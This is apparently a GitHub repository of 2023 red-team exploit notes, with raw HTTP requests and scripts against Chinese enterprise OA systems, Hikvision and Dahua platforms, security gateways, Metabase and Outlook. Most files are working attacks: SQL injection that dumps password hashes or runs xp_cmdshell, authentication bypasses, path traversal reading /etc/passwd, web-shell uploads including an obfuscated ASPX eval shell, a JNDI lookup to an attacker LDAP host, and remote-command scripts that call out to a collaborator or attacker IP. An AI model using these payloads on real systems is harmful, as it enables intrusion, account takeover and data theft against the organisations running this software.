├── README.md
├── 汉得SRM 登录绕过.md
├── 深X服应用交付系统命令执行漏洞.md
├── 辰信景云终端安全管理系统登录注入漏洞.md
├── 网神 SecSSL 任意密码修改漏洞.md
├── 锐捷 NBR 路由器文件上传漏洞.md
├── 蓝凌OA前台代码执行.md
├── 金和OASQL注入漏洞 .md
├── 大华智慧园区综合管理平台SQL注入漏洞.md
├── 用友时空KSOASQL注入漏洞.md
├── 绿盟 SAS堡垒机漏洞.md
├── 泛微 E-Cology SQL注入.md
├── 用友 移动管理系统文件上传漏洞.md
├── 网神 SecGate 上传漏洞.md
├── 海康威视漏洞.md
├── 用友 NC Cloud 文件上传漏洞.md
├── 泛微E-Office9文件上传漏洞.md
├── 大华智慧园区综合管理平台 文件上传漏洞.md
├── 通达OA SQL注入漏洞.md
├── 广联达oa 漏洞.md
├── Metabase RCE漏洞.md
├── 安恒 明御运维审计与风险控制系统 任意用户添加漏洞.md
├── Microsoft Outlook 提权漏洞.md
└── GitLab目录遍历漏洞.md


/README.md:
--------------------------------------------------------------------------------
1 | # 2023_Hvv
2 | 
3 | ## Warning：信息来自网络，请勿用作违法用途，否则后果自负**
4 | ### Enjoy again😏😏😏
5 | ### Have Fun 🤣🤣🤣
6 | ### Please give me a star ⭐⭐⭐
7 | 


--------------------------------------------------------------------------------
/汉得SRM 登录绕过.md:
--------------------------------------------------------------------------------
1 | ## 汉得SRM tomcat.jsp 登录绕过漏洞 
2 | 
3 | ```
4 | /tomcat.jsp?dataName=role_id&dataValue=1
5 | /tomcat.jsp?dataName=user_id&dataValue=1
6 | 
7 | 然后访问后台：/main.screen
8 | ```
9 | 


--------------------------------------------------------------------------------
/深X服应用交付系统命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | 
2 | ```
3 | POST /rep/login
4 | Host:10.10.10.1:85
5 | 
6 | clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
7 | ```
8 | 


--------------------------------------------------------------------------------
/辰信景云终端安全管理系统登录注入漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 辰信景云终端安全管理系统 login SQL注入漏洞
 2 | 
 3 | ```
 4 | 
 5 | POST /api/user/login
 6 | 
 7 | captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
 8 | 
 9 | ```
10 | 


--------------------------------------------------------------------------------
/网神 SecSSL 任意密码修改漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
 2 | 
 3 | ```
 4 | 
 5 | POST /changepass.php?type=2 
 6 | 
 7 | Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
 8 | old_pass=&password=Test123!@&repassword=Test123!@
 9 | ```
10 | 


--------------------------------------------------------------------------------
/锐捷 NBR 路由器文件上传漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
 2 | 
 3 | ```
 4 | POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
 5 | Host: 
 6 | Accept: text/plain, */*; q=0.01
 7 | Content-Disposition: form-data; name="file"; filename="111.php"
 8 | Content-Type: image/jpeg
 9 | 
10 | <?php phpinfo();?>
11 | ```
12 | 


--------------------------------------------------------------------------------
/蓝凌OA前台代码执行.md:
--------------------------------------------------------------------------------
 1 | ## 蓝凌OA前台代码执行
 2 | ```
 3 | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
 4 | Host: 127.0.0.1
 5 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
 6 | Accept: /
 7 | Connection: Keep-Alive
 8 | Content-Length: 42
 9 | Content-Type: application/x-www-form-urlencoded
10 | var={"body":{"file":"file:///etc/passwd"}}
11 | ```
12 | 


--------------------------------------------------------------------------------
/金和OASQL注入漏洞 .md:
--------------------------------------------------------------------------------
 1 | ## 金和OA C6-GetSqlData.aspx SQL注入漏洞 
 2 | 
 3 | ```
 4 | 
 5 | POST /C6/Control/GetSqlData.aspx/.ashx
 6 | Host: ip:port 
 7 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
 8 | Connection: close
 9 | Content-Length: 189
10 | Content-Type: text/plain
11 | Accept-Encoding: gzip
12 | 
13 | exec master..xp_cmdshell 'ipconfig'
14 | ```
15 | 


--------------------------------------------------------------------------------
/大华智慧园区综合管理平台SQL注入漏洞.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
 3 | 
 4 | ```
 5 | 
 6 | GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
 7 | Host: 127.0.0.1:7443
 8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
 9 | Accept-Encoding: gzip, deflate
10 | Connection: close
11 | ```
12 | 


--------------------------------------------------------------------------------
/用友时空KSOASQL注入漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 友时空KSOA PayBill SQL注入漏洞
 2 | 
 3 | ```
 4 | POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
 5 | Host: 1.1.1.1
 6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
 7 | Content-Length: 134
 8 | Accept-Encoding: gzip, deflate
 9 | Connection: close
10 | 
11 | <?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
12 | 
13 | ```
14 | 


--------------------------------------------------------------------------------
/绿盟 SAS堡垒机漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 绿盟 SAS堡垒机 GetFile 任意文件读取漏洞
 2 |   通过漏洞包含 www/local_user.php 实现任意⽤户登录
 3 | 
 4 | ```
 5 | /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
 6 | ```
 7 | 
 8 | ## 绿盟 SAS堡垒机 Exec 远程命令执行漏洞
 9 | 
10 | ```
11 | /webconf/Exec/index?cmd=whoami
12 | ```
13 | 
14 | ## 绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
15 | 
16 | ```
17 | /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
18 | ```
19 | 


--------------------------------------------------------------------------------
/泛微 E-Cology SQL注入.md:
--------------------------------------------------------------------------------
 1 | ## 泛微 E-Cology SQL注入漏洞
 2 | 
 3 | ```
 4 | 
 5 | POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
 6 | Host: ip:port 
 7 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
 8 | Connection: close
 9 | Content-Length: 189
10 | Content-Type: text/plain
11 | Accept-Encoding: gzip
12 | 
13 | callCount=1
14 | page=
15 | httpSessionId=
16 | scriptSessionId=
17 | c0-scriptName=DocDwrUtil
18 | c0-methodName=ifNewsCheckOutByCurrentUser
19 | c0-id=0
20 | c0-param0=string:1 AND 1=1
21 | c0-param1=string:1
22 | batchId=0
23 | ```
24 | 


--------------------------------------------------------------------------------
/用友 移动管理系统文件上传漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 用友 移动管理系统 uploadApk.do 任意文件上传漏洞
 2 | 
 3 | ### 访问路径：/maupload/apk/a.jsp
 4 | 
 5 | ```
 6 | POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
 7 | Host: 
 8 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
11 | Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
12 | Connection: close
13 | 
14 | ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
15 | Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
16 | Content-Type: application/msword
17 | 
18 | hello
19 | ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
20 | ```
21 | 


--------------------------------------------------------------------------------
/网神 SecGate 上传漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 网神 SecGate 3600 防火墙 obj_app_upfile上传漏洞
 2 | 
 3 | ### 访问路径：attachements/xxx.php
 4 | ```
 5 | POST /?g=obj_app_upfile HTTP/1.1
 6 | Host: x.x.x.x
 7 | Accept: */*
 8 | Accept-Encoding: gzip, deflate
 9 | Content-Length: 574
10 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
11 | User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
12 | 
13 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
14 | Content-Disposition: form-data; name="MAX_FILE_SIZE"
15 | 
16 | 10000000
17 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
18 | Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
19 | Content-Type: text/plain
20 | 
21 | <?php php马?>
22 | 
23 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
24 | Content-Disposition: form-data; name="submit_post"
25 | 
26 | obj_app_upfile
27 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
28 | Content-Disposition: form-data; name="__hash__"
29 | 
30 | 0b9d6b1ab7479ab69d9f71b05e0e9445
31 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc--
32 | ```
33 | 


--------------------------------------------------------------------------------
/海康威视漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 文件上传漏洞  
 2 | 
 3 |   ### 上传之后的访问路径：/portal/ui/login/..;/..;/new.jsp  
 4 |   
 5 |   综合安防管理平台 files 任意文件上传漏洞
 6 | ```
 7 | 
 8 | POST /center/api/files;.html HTTP/1.1
 9 | Host: 10.10.10.10
10 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
11 | 
12 | ------WebKitFormBoundary9PggsiM755PLa54a
13 | Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
14 | Content-Type: application/zip
15 | 
16 | <%jsp的马%>
17 | ------WebKitFormBoundary9PggsiM755PLa54a--
18 | ```
19 | 
20 | 
21 |   综合安防管理平台 report 任意文件上传漏洞
22 | 
23 | ```
24 | 
25 | POST /svm/api/external/report HTTP/1.1
26 | Host: 10.10.10.10
27 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
28 | 
29 | ------WebKitFormBoundary9PggsiM755PLa54a
30 | Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
31 | Content-Type: application/zip
32 | 
33 | <%jsp的马%>
34 | 
35 | ------WebKitFormBoundary9PggsiM755PLa54a--
36 | ```
37 | 


--------------------------------------------------------------------------------
/用友 NC Cloud 文件上传漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 用友 NC Cloud jsinvoke 任意文件上传漏洞
 2 | 
 3 | ```
 4 | POST /uapjs/jsinvoke/?action=invoke
 5 | Content-Type: application/json
 6 | 
 7 | {
 8 |     "serviceName":"nc.itf.iufo.IBaseSPService",
 9 |     "methodName":"saveXStreamConfig",
10 |     "parameterTypes":[
11 |         "java.lang.Object",
12 |         "java.lang.String"
13 |     ], 
14 |     "parameters":[
15 |         "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
16 |         "webapps/nc_web/407.jsp"
17 |     ]
18 | }
19 | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
20 | Host: 
21 | Connection: Keep-Alive
22 | Content-Length: 253
23 | Content-Type: application/x-www-form-urlencoded
24 | 
25 | 
26 | {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}
27 | ```
28 | 
29 | 上传之后访问
30 | ```
31 | /cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream()) 
32 | 
33 | ```
34 | 


--------------------------------------------------------------------------------
/泛微E-Office9文件上传漏洞.md:
--------------------------------------------------------------------------------
 1 | ## CVE-2023-2523
 2 | 
 3 | ```
 4 | 
 5 | POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 
 6 | Host:192.168.233.10:8082  
 7 | Cache-Control:max-age=0  
 8 | Upgrade-Insecure-Requests:1  
 9 | Origin:null  
10 | Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
11 | Accept-Encoding:gzip, deflate
12 | Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
13 | Connection:close
14 | 
15 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
16 | Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
17 | Content-Type:image/jpeg
18 | <?phpphpinfo();?>
19 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
20 | ```
21 | 
22 | 
23 | 
24 | ## CVE-2023-2648
25 | 
26 | 
27 | ```
28 | 
29 | POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
30 | Host: 192.168.233.10:8082
31 | User-Agent: test
32 | Connection: close
33 | Content-Length: 493
34 | Accept-Encoding: gzip
35 | Content-Type: multipart/form-data
36 | 
37 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
38 | Content-Disposition: form-data; name="Filedata"; filename="666.php"
39 | Content-Type: application/octet-stream
40 | 
41 | <?php phpinfo();?>
42 | 
43 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
44 | 
45 | ```
46 | 


--------------------------------------------------------------------------------
/大华智慧园区综合管理平台 文件上传漏洞.md:
--------------------------------------------------------------------------------
 1 | ## 大华智慧园区综合管理平台 文件上传漏洞.md
 2 | 
 3 | ```
 4 | POST /publishing/publishing/material/file/video HTTP/1.1
 5 | Host: 127.0.0.1:7443
 6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
 7 | Content-Length: 804
 8 | Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
 9 | Accept-Encoding: gzip, deflate
10 | Connection: close
11 | 
12 | --dd8f988919484abab3816881c55272a7
13 | Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
14 | 
15 | <%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
16 | --dd8f988919484abab3816881c55272a7
17 | Content-Disposition: form-data; name="poc"
18 | 
19 | poc
20 | --dd8f988919484abab3816881c55272a7
21 | Content-Disposition: form-data; name="Submit"
22 | 
23 | submit
24 | --dd8f988919484abab3816881c55272a7--
25 | ```
26 | 


--------------------------------------------------------------------------------
/通达OA SQL注入漏洞.md:
--------------------------------------------------------------------------------
 1 | ## CVE-2023-4165：
 2 | 
 3 |   /general/system/seal_manage/iweboffice/delete_seal.php路径下的DELETE_STR参数存在SQL注入漏洞，可能导致通过SQL盲注（延时注入）获取数据库中的敏感信息。
 4 | 
 5 |   ```
 6 | GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
 7 | Host: 127.0.0.1:8080
 8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
10 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
11 | Accept-Encoding: gzip, deflate
12 | Connection: close
13 | Upgrade-Insecure-Requests: 1
14 |   ```
15 | 
16 | ## CVE-2023-4166：
17 | 
18 |   /general/system/seal_manage/dianju/delete_log.php路径下的$DELETE_STR参数存在SQL注入漏洞，可能导致通过SQL盲注（延时注入）获取数据库中的敏感信息。
19 | 
20 |   ```
21 | GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
22 | Host: 127.0.0.1:8080
23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
24 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
25 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
26 | Accept-Encoding: gzip, deflate
27 | Connection: close
28 | Upgrade-Insecure-Requests: 1
29 |   ```
30 | 
31 |   
32 |   ## 印象范围
33 |   通达OA < v11.10
34 | 


--------------------------------------------------------------------------------
/广联达oa 漏洞.md:
--------------------------------------------------------------------------------
 1 | ## sql注入漏洞
 2 | 
 3 | ```
 4 | POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
 5 | Host: xxx.com
 6 | Upgrade-Insecure-Requests: 1
 7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
 8 | Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 9 | Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: zh-CN,zh;q=0.9
12 | Cookie: 
13 | Connection: close
14 | Content-Type: application/x-www-form-urlencoded
15 | Content-Length: 88
16 | 
17 | dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
18 | 
19 | ```
20 | 
21 | 
22 | ## 文件上传漏洞
23 | 
24 | ```
25 | POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
26 | Host: 10.10.10.1:8888
27 | X-Requested-With: Ext.basex
28 | Accept: text/html, application/xhtml+xml, image/jxr, */*
29 | Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
30 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
31 | Accept-Encoding: gzip, deflate
32 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
33 | Accept: */*
34 | Origin: http://10.10.10.1
35 | Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
36 | Cookie: 
37 | Connection: close
38 | Content-Length: 421
39 | 
40 | ------WebKitFormBoundaryFfJZ4PlAZBixjELj
41 | Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
42 | Content-Type: application/text
43 | 
44 | <%@ Page Language="Jscript" Debug=true%>
45 | <%
46 | var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
47 | var GFMA=Request.Form("qmq1");
48 | var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
49 | eval(GFMA, ONOQ);
50 | %>
51 | 
52 | ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
53 | ```
54 | 


--------------------------------------------------------------------------------
/Metabase RCE漏洞.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## CVE-2023-38646
 3 | 
 4 | ## 影响版本
 5 | Metabase open source 0.46 < 0.46.6.1  
 6 | Metabase open source 0.45 < v0.45.4.1  
 7 | Metabase open source 0.44 < 0.44.7.1  
 8 | Metabase open source 0.43 < 0.43.7.2  
 9 | Metabase Enterprise 1.45 < 1.45.4.1  
10 | Metabase Enterprise 1.46 < 1.46.6.1  
11 | Metabase Enterprise 1.44 < 1.44.7.1  
12 | Metabase Enterprise 1.43 < 1.43.7.2  
13 | 
14 | ## python脚本
15 | ```
16 | 
17 | # https://github.com/0xrobiul/CVE-2023-38646
18 | 
19 | import requests
20 | import argparse
21 | from colorama import Fore, Style
22 | Gcyan = Fore.YELLOW + Style.BRIGHT
23 | Cyan = Fore.CYAN + Style.BRIGHT
24 | STOP = Style.RESET_ALL
25 | logo = '''
26 |    _____   _____   ___ __ ___ ____   ____ ___   __ _ _   __ 
27 |   / __\ \ / / __|_|_  )  \_  )__ /__|__ /( _ ) / /| | | / / 
28 |  | (__ \ V /| _|___/ / () / / |_ \___|_ \/ _ \/ _ \_  _/ _ \\
29 |   \___| \_/ |___| /___\__/___|___/  |___/\___/\___/ |_|\___/
30 |                                                             
31 | '''
32 | print(Gcyan + logo + STOP)
33 | print(Cyan + "The PoC Finder!!" + STOP + Gcyan + "   By: 0xRobiul\n" + STOP)
34 | 
35 | 
36 | parser = argparse.ArgumentParser()
37 | parser.add_argument("-u", "--url", type=str, required=True, help="Target URL.")
38 | parser.add_argument("-t", "--token", type=str, required=True, help="Setup-Token From /api/session/properties .")
39 | parser.add_argument("-c", "--collabrator", type=str, required=True, help="Burp Collabrator Client.")
40 | args = parser.parse_args()
41 | 
42 | url = args.url + "/api/setup/validate"
43 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "application/json", "Content-Type": "application/json", "Connection": "close"}
44 | payload={"details": {"details": {"advanced-options": True, "classname": "org.h2.Driver", "subname": "mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('curl -d key=0xRobiul " + args.collabrator +"');", "subprotocol": "h2"}, "engine": "postgres", "name": "x"}, "token": args.token}
45 | attk = requests.post(url, headers=headers, json=payload)
46 | 
47 | print(Cyan + "Done!! Check Burp Colabrator!!" + STOP)
48 | ```
49 | 
50 | 
51 | 


--------------------------------------------------------------------------------
/安恒 明御运维审计与风险控制系统 任意用户添加漏洞.md:
--------------------------------------------------------------------------------
  1 | ## 安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞
  2 | 
  3 | ```
  4 | POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
  5 | Host: 
  6 | Cookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3
  7 | Content-Length: 1117
  8 | Cache-Control: max-age=0
  9 | Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
 10 | Sec-Ch-Ua-Mobile: ?0
 11 | Sec-Ch-Ua-Platform: "Windows"
 12 | Upgrade-Insecure-Requests: 1
 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
 14 | Content-Type: application/x-www-form-urlencoded
 15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 16 | Sec-Fetch-Site: same-origin
 17 | Sec-Fetch-Mode: navigate
 18 | Sec-Fetch-User: ?1
 19 | Sec-Fetch-Dest: document
 20 | Accept-Encoding: gzip, deflate
 21 | Accept-Language: zh-CN,zh;q=0.9
 22 | Connection: close
 23 | 
 24 | <?xml version="1.0"?>  
 25 | <methodCall>
 26 | <methodName>web.user_add</methodName>
 27 | <params>
 28 | <param>
 29 | <value>
 30 | <array>
 31 | <data>
 32 | <value>
 33 | <string>admin</string>
 34 | </value>
 35 | <value>
 36 | <string>5</string>
 37 | </value>
 38 | <value>
 39 | <string>10.0.0.1</string>
 40 | </value>
 41 | </data>
 42 | </array>
 43 | </value>
 44 | </param>
 45 | <param>
 46 | <value>
 47 | <struct>
 48 | <member>
 49 | <name>uname</name>
 50 | <value>
 51 | <string>test</string>
 52 | </value>
 53 | </member>
 54 | <member>
 55 | <name>name</name>
 56 | <value>
 57 | <string>test</string>
 58 | </value>
 59 | </member>
 60 | <member>
 61 | <name>pwd</name>
 62 | <value>
 63 | <string>1qaz@3edC12345</string>
 64 | </value>
 65 | </member>
 66 | <member>
 67 | <name>authmode</name>
 68 | <value>
 69 | <string>1</string>
 70 | </value>
 71 | </member>
 72 | <member>
 73 | <name>deptid</name>
 74 | <value>
 75 | <string></string>
 76 | </value>
 77 | </member>
 78 | <member>
 79 | <name>email</name>
 80 | <value>
 81 | <string></string>
 82 | </value>
 83 | </member>
 84 | <member>
 85 | <name>mobile</name>
 86 | <value>
 87 | <string></string>
 88 | </value>
 89 | </member>
 90 | <member>
 91 | <name>comment</name>
 92 | <value>
 93 | <string></string>
 94 | </value>
 95 | </member>
 96 | <member>
 97 | <name>roleid</name>
 98 | <value>
 99 | <string>102</string>
100 | </value>
101 | </member>
102 | </struct></value>
103 | </param>
104 | </params>
105 | </methodCall>
106 | ```
107 | 


--------------------------------------------------------------------------------
/Microsoft Outlook 提权漏洞.md:
--------------------------------------------------------------------------------
 1 | ## CVE-2023-23397
 2 | 
 3 | ### 影响版本
 4 | Microsoft Outlook 2016 (64-bit edition)=N/A  
 5 | Microsoft Outlook 2013 Service Pack 1 (32-bit editions)=N/A  
 6 | Microsoft Outlook 2013 RT Service Pack 1=N/A  
 7 | Microsoft Outlook 2013 Service Pack 1 (64-bit editions)=N/A  
 8 | Microsoft Office 2019 for 32-bit editions=N/A  
 9 | Microsoft 365 Apps for Enterprise for 32-bit Systems=N/A  
10 | Microsoft Office 2019 for 64-bit editions=N/A  
11 | Microsoft 365 Apps for Enterprise for 64-bit Systems=N/A  
12 | Microsoft Office LTSC 2021 for 64-bit editions=N/A  
13 | Microsoft Outlook 2016 (32-bit edition)=N/A   
14 | Microsoft 365 Apps for Enterprise for 64-bit Systems=N/A  
15 | Microsoft Office LTSC 2021 for 32-bit editions=N/A  
16 | 
17 | ### 用法
18 | 1. 安装pywin32：pip install pywin32  
19 | 2. 攻击者机器上启动SMB服务器，例如Metasploit的SMB模块  
20 | 3. python Exploit.py <save_or_send> <target email> <attacker_ip>   
21 | 
22 | ```
23 | #!/usr/bin/python3
24 | #     PoC for CVE-2023-23397 v1.2
25 | #     Copyright (C) 2022 - Gianluca Tiepolo, Maria Saleri
26 | #
27 | #      https://github.com/tiepologian/CVE-2023-23397/blob/main/Exploit.py
28 | #
29 | #     This program is free software: you can redistribute it and/or modify
30 | #     it under the terms of the GNU General Public License as published by
31 | #     the Free Software Foundation, either version 3 of the License, or
32 | #     (at your option) any later version.
33 | #
34 | #     This program is distributed in the hope that it will be useful,
35 | #     but WITHOUT ANY WARRANTY; without even the implied warranty of
36 | #     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
37 | #     GNU General Public License for more details.
38 | #
39 | #     You should have received a copy of the GNU General Public License
40 | #     along with this program.  If not, see <https://www.gnu.org/licenses/>.
41 | #
42 | #     Usage: python Exploit.py <save_or_send> <target email> <attacker_ip>
43 | 
44 | import win32com.client
45 | import sys, datetime, os, argparse
46 | 
47 | def saveMail(appt):
48 |     exportPath = 'malicious.msg'
49 |     appt.SaveAs(os.path.abspath(exportPath))
50 |     print("[*] Finished, saved to", os.path.abspath(exportPath))
51 | 
52 | def sendMail(appt):
53 |     appt.Send()
54 |     print("[*] Finished, e-mail sent!")
55 | 
56 | def generateMail(cmd, target, c2):
57 |     outlook = win32com.client.Dispatch("Outlook.Application")
58 |     appt = outlook.CreateItem(1) # AppointmentItem
59 |     print("[*] Generating malicious e-mail...")
60 |     output_date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
61 |     appt.Start = output_date # yyyy-MM-dd hh:mm
62 |     appt.AllDayEvent = True
63 |     appt.Subject = "Testing CVE-2023-23397"
64 |     appt.body = "Thank you for your hash!"
65 |     appt.Location = "TeamRocket"
66 |     appt.MeetingStatus = 1
67 |     appt.Recipients.Add(target)
